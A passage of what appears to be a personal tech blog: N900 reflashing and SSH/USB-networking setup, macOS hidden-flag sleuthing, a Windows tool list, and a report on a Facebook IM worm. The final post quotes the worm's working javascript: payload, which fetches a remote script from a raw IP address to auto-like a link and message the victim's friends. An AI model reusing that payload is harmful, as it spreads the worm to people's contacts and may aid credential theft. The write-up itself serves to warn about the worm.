        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2101, 2102, 2103
        Version 1.4.14.9+0m5
Image '2nd', size 14848 bytes
        Valid for RX-51: 2307, 2308, 2309, 2310
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2307, 2308, 2309, 2310
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2307, 2308, 2309, 2310
        Version 1.4.14.9+0m5
Image '2nd', size 14848 bytes
        Valid for RX-51: 2407, 2408, 2409, 2410
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2407, 2408, 2409, 2410
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2407, 2408, 2409, 2410
        Version 1.4.14.9+0m5
Image '2nd', size 14848 bytes
        Valid for RX-51: 2301, 2302, 2303, 2304, 2305, 2306
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2301, 2302, 2303, 2304, 2305, 2306
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2301, 2302, 2303, 2304, 2305, 2306
        Version 1.4.14.9+0m5
Image '2nd', size 14848 bytes
        Valid for RX-51: 2401, 2402, 2403, 2404, 2405, 2406
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2401, 2402, 2403, 2404, 2405, 2406
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2401, 2402, 2403, 2404, 2405, 2406
        Version 1.4.14.9+0m5
Image '2nd', size 14720 bytes
        Valid for RX-51: 2104, 2105, 2106, 2107, 2108, 2109, 2110, 2111, 2112, 2113, 2114, 2115, 2116, 2117, 2118, 2119
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2104, 2105, 2106, 2107, 2108, 2109, 2110, 2111, 2112, 2113, 2114, 2115, 2116, 2117, 2118, 2119
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2104, 2105, 2106, 2107, 2108, 2109, 2110, 2111, 2112, 2113, 2114, 2115, 2116, 2117, 2118, 2119
        Version 1.4.14.9+0m5
Image '2nd', size 14848 bytes
        Valid for RX-51: 2501, 2502, 2503, 2504, 2505, 2506
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2501, 2502, 2503, 2504, 2505, 2506
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2501, 2502, 2503, 2504, 2505, 2506
        Version 1.4.14.9+0m5
Image '2nd', size 14848 bytes
        Valid for RX-51: 2607, 2608, 2609, 2610
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2607, 2608, 2609, 2610
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2607, 2608, 2609, 2610
        Version 1.4.14.9+0m5
Image '2nd', size 14848 bytes
        Valid for RX-51: 2507, 2508, 2509, 2510
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2507, 2508, 2509, 2510
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2507, 2508, 2509, 2510
        Version 1.4.14.9+0m5
Image '2nd', size 14720 bytes
        Valid for RX-51: 2201, 2202, 2203, 2204, 2205, 2206, 2207, 2208, 2209, 2210, 2211, 2212, 2213, 2214, 2215, 2216
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2201, 2202, 2203, 2204, 2205, 2206, 2207, 2208, 2209, 2210, 2211, 2212, 2213, 2214, 2215, 2216
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2201, 2202, 2203, 2204, 2205, 2206, 2207, 2208, 2209, 2210, 2211, 2212, 2213, 2214, 2215, 2216
        Version 1.4.14.9+0m5
Image '2nd', size 14848 bytes
        Valid for RX-51: 2601, 2602, 2603, 2604, 2605, 2606
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2601, 2602, 2603, 2604, 2605, 2606
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2601, 2602, 2603, 2604, 2605, 2606
        Version 1.4.14.9+0m5
USB device found found at bus bus-0, device address \\.\libusb0-0001--0x0421-0x0105.
Found device RX-51, hardware revision 2101
NOLO version 1.4.14
Version of 'sw-release': RX-51_2009SE_21.2011.38-1.002_PR_002
Sending xloader image (14 kB)...
100% (14 of 14 kB, avg. 2900 kB/s)
Sending secondary image (106 kB)...
100% (106 of 106 kB, avg. 13359 kB/s)
Flashing bootloader... done.
Sending cmt-2nd image (79 kB)...
100% (79 of 79 kB, avg. 13250 kB/s)
Sending cmt-algo image (507 kB)...
100% (507 of 507 kB, avg. 25381 kB/s)
Sending cmt-mcusw image (5826 kB)...
100% (5826 of 5826 kB, avg. 31839 kB/s)
Flashing cmt-mcusw... done.
Sending kernel image (1705 kB)...
100% (1705 of 1705 kB, avg. 30459 kB/s)
Flashing kernel... done.
Sending and flashing rootfs image (185728 kB)...
100% (185728 of 185728 kB, avg. 13689 kB/s)
Finishing flashing... done
CMT flashed successfully

The -R flag reboots the N900 after flashing. The N900 goes through the “5 white dots” boot sequence, then asks for date and time input. Looks like all settings were wiped, as planned.

Install community-maintained Maemo (CSSU)

Maemo wiki: Community SSU

Go to http://repository.maemo.org/community/community-fremantle.install in the N900’s built-in Web browser to install the Stable variant of the CSSU. Add the catalog and let it install the CSSU Enabler, clicking through all the messages. Close the app manager (HAM) and open the Community SSU app that it just installed; if it complains that HAM is still open, just run it again. Once it’s done, it returns you to HAM. Click Update All to install the CSSU Maemo update, a 34 MB download that may take a while over WiFi.

Fill the temporal void with fruit salad.

The phone will eventually reboot, and you’ll get an “Operating system updated” banner.

Useful apps

Install “OpenSSH Client and Server” from the Network section in HAM. Set a root password when it asks for one.

Install “rootsh” from the System section in HAM, which gives you the gainroot script (equivalent to su?).

Open an xterm and become root (sudo gainroot). Edit /etc/passwd using vi or whatever to change the password field of the user account from ! to *; otherwise you won’t be able to log in over SSH using pubkey auth, because sshd treats an account with ! in the password field as locked out. (BTW, I learned this by running the OpenSSH server in debug mode with sshd -d, where it stays attached to the terminal and shows useful status messages.)
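If you’d rather not fumble with vi on the N900’s keyboard, that edit is scriptable. A sketch, assuming Maemo’s default account name user; the sample passwd line below is made up for illustration:

```shell
#!/bin/sh
# Sketch of the same edit as a one-liner. On the device you'd run it as root
# against the real file:
#   sed -i 's/^user:!:/user:*:/' /etc/passwd
# Demonstrated here on a sample locked entry:
echo 'user:!:29999:29999:User:/home/user:/bin/sh' | sed 's/^user:!:/user:*:/'
# → user:*:29999:29999:User:/home/user:/bin/sh
```

The pattern is anchored to the user account, so other entries (root included) are left alone.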

Raspberry Pi network interface config

My Pi is running Raspbian.

Before any N900-specific config, you can plug in the N900 and it’ll be detected as a USB Ethernet adapter, normally network interface usb0.

dmesg output:

[ 1108.249401] usb 1-1.3: new high speed USB device number 55 using dwc_otg
[ 1108.351182] usb 1-1.3: New USB device found, idVendor=0421, idProduct=01c8
[ 1108.351219] usb 1-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[ 1108.351241] usb 1-1.3: Product: N900 (PC-Suite Mode)
[ 1108.351258] usb 1-1.3: Manufacturer: Nokia
[ 1108.365353] cdc_acm 1-1.3:1.6: This device cannot do calls on its own. It is not a modem.
[ 1108.365930] cdc_acm 1-1.3:1.6: ttyACM0: USB ACM device
[ 1108.378603] cdc_ether 1-1.3:1.8: usb0: register 'cdc_ether' at usb-bcm2708_usb-1.3, CDC Ethernet Device, 56:7d:26:7a:1a:63

ifconfig output:

usb0      Link encap:Ethernet  HWaddr 56:7d:26:7a:1a:63
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Maemo wiki: N900 USB networking

I’m using the instructions for Debian Lenny. Add a new udev rule matching the N900’s identifiers:

/etc/udev/rules.d/99-nokia-n900.rules:

SUBSYSTEM=="net", ACTION=="add", ATTRS{idVendor}=="0421", ATTRS{idProduct}=="01c8", ATTRS{manufacturer}=="Nokia", ATTRS{product}=="N900 (PC-Suite Mode)", NAME="n900"

Reload the udev rules:

udevadm control --reload-rules

Unplug and replug the N900. The N900 now comes up as the n900 interface in dmesg:

[ 2275.378869] usb 1-1.3: USB disconnect, device number 55
[ 2275.397706] cdc_ether 1-1.3:1.8: usb0: unregister 'cdc_ether' usb-bcm2708_usb-1.3, CDC Ethernet Device
[ 2277.147123] usb 1-1.3: new high speed USB device number 56 using dwc_otg
[ 2277.248904] usb 1-1.3: New USB device found, idVendor=0421, idProduct=01c8
[ 2277.248940] usb 1-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[ 2277.248961] usb 1-1.3: Product: N900 (PC-Suite Mode)
[ 2277.248979] usb 1-1.3: Manufacturer: Nokia
[ 2277.265004] cdc_acm 1-1.3:1.6: This device cannot do calls on its own. It is not a modem.
[ 2277.265592] cdc_acm 1-1.3:1.6: ttyACM0: USB ACM device
[ 2277.277117] cdc_ether 1-1.3:1.8: usb0: register 'cdc_ether' at usb-bcm2708_usb-1.3, CDC Ethernet Device, 56:7d:26:7a:1a:63
[ 2277.572415] udevd[5046]: renamed network interface usb0 to n900

and ifconfig:

n900      Link encap:Ethernet  HWaddr 56:7d:26:7a:1a:63
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

The N900 expects that the USB host will be using IP address 192.168.2.14, so let’s make that happen on system boot and when the N900 is plugged in (auto and allow-hotplug respectively). Edit /etc/network/interfaces to add these lines:

allow-hotplug n900
auto n900
iface n900 inet static
    address 192.168.2.14
    netmask 255.255.255.0

Bring it online now:

ifup n900

Confirm that the IP got assigned with ifconfig n900:

n900      Link encap:Ethernet  HWaddr 56:7d:26:7a:1a:63
          inet addr:192.168.2.14  Bcast:192.168.2.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Note, as I just found out, that this only works if you connect the N900 in “PC Suite” or “Charging Only” mode. If you connect it in “Mass Storage” mode, it instead emulates a USB mass-storage device, exposing its microSD reader and internal storage, and you’ll see this in dmesg:

[ 3440.675342] usb 1-1.3: new high speed USB device number 64 using dwc_otg
[ 3440.777489] usb 1-1.3: New USB device found, idVendor=0421, idProduct=01c7
[ 3440.777525] usb 1-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[ 3440.777547] usb 1-1.3: Product: N900 (Storage Mode)
[ 3440.777564] usb 1-1.3: Manufacturer: Nokia
[ 3440.777580] usb 1-1.3: SerialNumber: 372041756775
[ 3440.788540] scsi2 : usb-storage 1-1.3:1.0
[ 3441.796667] scsi 2:0:0:0: Direct-Access     Nokia    N900              031 PQ: 0 ANSI: 2
[ 3441.802419] sd 2:0:0:0: [sda] Attached SCSI removable disk
[ 3441.807315] scsi 2:0:0:1: Direct-Access     Nokia    N900              031 PQ: 0 ANSI: 2
[ 3441.813912] sd 2:0:0:1: [sdb] Attached SCSI removable disk
[ 3441.969928] sda: detected capacity change from 7948206080 to 0
[ 3444.909499] sd 2:0:0:0: [sda] 56631296 512-byte logical blocks: (28.9 GB/27.0 GiB)
[ 3444.911077] sd 2:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA
[ 3445.128870]  sda:
[ 3448.903605] sd 2:0:0:1: [sdb] 15523840 512-byte logical blocks: (7.94 GB/7.40 GiB)
[ 3448.904939] sd 2:0:0:1: [sdb] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA
[ 3448.913276]  sdb: sdb1

The mode setting seems to be sticky: you can get the N900 to go back to being a fake Ethernet adapter by connecting it at least once in PC Suite mode, after which it can be unplugged and replugged as much as you like, even if you leave it in Charging Only by not selecting a mode. However, the mode setting doesn’t persist across reboots. When I power-cycled my N900 while it was connected to the Pi, it didn’t come up as a network device until I manually selected PC Suite mode again.
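Since the mode matters so much, here’s a sketch of a shell helper for the Pi that tells the modes apart by USB product ID: per the dmesg output above, PC Suite mode enumerates as 0421:01c8 and Mass Storage mode as 0421:01c7. The function name and canned demo lines are my own, not standard tooling:

```shell
#!/bin/sh
# Sketch: classify the N900's USB mode from a line of lsusb output,
# keyed on the vendor:product IDs seen in dmesg above.
n900_mode() {
    case "$1" in
        *"0421:01c8"*) echo "pc-suite" ;;
        *"0421:01c7"*) echo "mass-storage" ;;
        *) echo "not-found" ;;
    esac
}

# demo on canned lsusb lines:
n900_mode "Bus 001 Device 055: ID 0421:01c8 Nokia Mobile Phones"   # → pc-suite
n900_mode "Bus 001 Device 064: ID 0421:01c7 Nokia Mobile Phones"   # → mass-storage
```

On the Pi you’d call it as n900_mode "$(lsusb)".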


find hidden files with lsflags, show them with chflags

I want to go fishing in my work Mac’s ~/Library folder for some app settings files, but Apple has decided to hide it from me. I could use ⌘-Shift-G, or open ~/Library, but that’s not the kind of guy I am. Why is it hidden? The filename doesn’t start with a dot, so the Finder’s going on something other than Unix convention there. Were this 1998, I’d launch ResEdit and clear the folder’s HFS hidden flag. Maybe that’s still around in some form? I’ll look at the file’s extended attributes, because I’ve seen other HFS stuff like resource forks in there.

Arachnoscope:Desktop steelpangolin$ xattr -l ~/Library
com.apple.FinderInfo:
00000000  00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  |........@.......|
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000020

Well, I was hoping for something more like com.apple.Hidden, but this is a start. Except it’s completely opaque. Googling… aha. A hidden flag is mentioned in the chflags man page. But how do I confirm that this flag is actually why the Library’s omitted from the Finder’s listings? Is there any way to read flags?

Arachnoscope:Desktop steelpangolin$ ls /usr/bin | grep flag
chflags

Nope. Back to the man pages; I’ll have to write one myself: lsflags.c.

Now I’ll give it a go:

Arachnoscope:Desktop steelpangolin$ gcc -std=c99 -Wall lsflags.c -o lsflags
Arachnoscope:Desktop steelpangolin$ ./lsflags ~/Library
/Users/steelpangolin/Library: hidden
Arachnoscope:Desktop steelpangolin$ chflags nohidden ~/Library
Arachnoscope:Desktop steelpangolin$ ./lsflags ~/Library
/Users/steelpangolin/Library: 
Arachnoscope:Desktop steelpangolin$ xattr -l ~/Library

Hooray. The flag shows up, and it is indeed stored in the com.apple.FinderInfo xattr, because both disappear when I remove it. But what’s this, at the end of the first man page I found?

You can use “ls -lO” to see the flags of existing files.

Note to self: read all the way to the end next time.
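Incidentally, that opaque FinderInfo dump is decodable by hand: for a folder, the Finder flags word sits at bytes 8–9, and the invisible flag is 0x4000, assuming I’m reading the old Carbon Finder.h layout right. A sketch, using the bytes from the xattr dump above:

```shell
#!/bin/sh
# Sketch: decode the invisible flag (0x4000 in the 16-bit Finder flags word,
# i.e. bit 0x40 of byte 8) from a com.apple.FinderInfo hex dump.
# Bytes here are copied from the xattr -l output above; on a Mac you'd get
# them from: xattr -px com.apple.FinderInfo ~/Library
finderinfo="00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00"
byte8=$(echo "$finderinfo" | awk '{print $9}')
if [ $(( 0x$byte8 & 0x40 )) -ne 0 ]; then
    echo "hidden"
else
    echo "not hidden"
fi
# → hidden
```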


freeware loadout for a Windows dev box

Just brought my home Windows desktop up to a state of usefulness comparable with my work Mac. Here’s what I installed today:

Gow (GNU on Windows): Common Unix utilities packaged for Windows. Equivalent to GnuWin32 but with a much better installer.

Console2: Better console. Supports tabs, drag to copy and right-click to paste, custom text colors, and bookmarks for starting up command-line apps (Python, GHCi) or shells with different environments (useful for Visual Studio’s command line stuff).

Programmer’s Notepad: The best lightweight code editor. Syntax highlighting, tabs, Ctags support, etc. Better UI than Notepad++.

Sysinternals: Contains Process Explorer (an improved version of Task Manager) and Process Monitor (realtime display of what files and registry entries are in use).

ack: Programmer-friendly grep replacement that supports match context, recursive search of a directory tree, filtering by source type/language, and ignoring VCS files. Codification of the common sense behavior that normally requires hours of smacking find, xargs, and grep around. Requires a Perl interpreter; I use the community edition of ActivePerl.

TortoiseSVN: SVN client for Windows Explorer.

7-Zip: compression utility.

KeePass: Password manager. I use KeePass 1.x (still actively developed) because it’s compatible with KeePass implementations on other platforms such as KeePassX (Mac, Linux) and KyPass (iOS).

PuTTY: SSH terminal.

WinSCP: SFTP client.

Chrome: with FeverPHP, JSONView, and Edit This Cookie. I used to prefer Firefox with Firebug for development, but it’s gotten unusably slow.

Fiddler: HTTP/HTTPS debugging proxy. Similar to Charles.

Aptana Studio 3: Eclipse distro for webapp development. Like all Eclipse-based products, it’s clunky at times, but once a project grows beyond a few folders, managing it without an IDE is painful, and Aptana’s the best one I’ve found yet. Includes PyDev for Python, and has its own editors for Javascript, HTML, and PHP (Aptana’s PHP support is much, much better than Eclipse PDT’s). Also includes a handy SFTP folder syncer: you map a local project folder to a remote folder and can then upload individual files or sync whole folders with one click. I’ve added Subclipse with the CollabNet merge client for SVN support and DTP for SQL syntax highlighting.


Clipboard spam

Talking to friends in IRC just now, someone pasted content from the SF Gate which had a Read More link attached that wasn’t in the original page. I went to the page and couldn’t replicate that behavior. A little digging revealed that a Tynt script attaches an oncopy event handler that puts that extra crap in, and that the Ghostery Firefox extension was blocking Tynt on my own machine. Thanks, Ghostery!

new variant of Facebook April Fool’s IM worm

There’s a new variant of the Facebook April Fool’s worm going around. This one appears as an IM with the text “haha! hilarous http://fb.me/TzCxMrJW”; the page behind the URL shortener is http://apps.facebook.com/bullydown/ (taken down since I started writing this, see screenshot) which appears to be a Facebook video but actually loads some JavaScript using an onclick handler:

javascript:if(window.opener){ window.opener.document.body.appendChild(document.createElement('script')).src='http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous'; window.close(); }else{ document.body.appendChild(document.createElement('script')).src='http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous'; }

[Screenshot: the “Bully Down” Facebook app page]

Whatever it loads seems to Facebook Like the link http://winterweddingfavor.info/bullypal/ and then IM your friends; I got three messages in a short span of time. I’m not sure what’s required to send IMs through Facebook; it may use a fake login page to steal credentials like other variants.

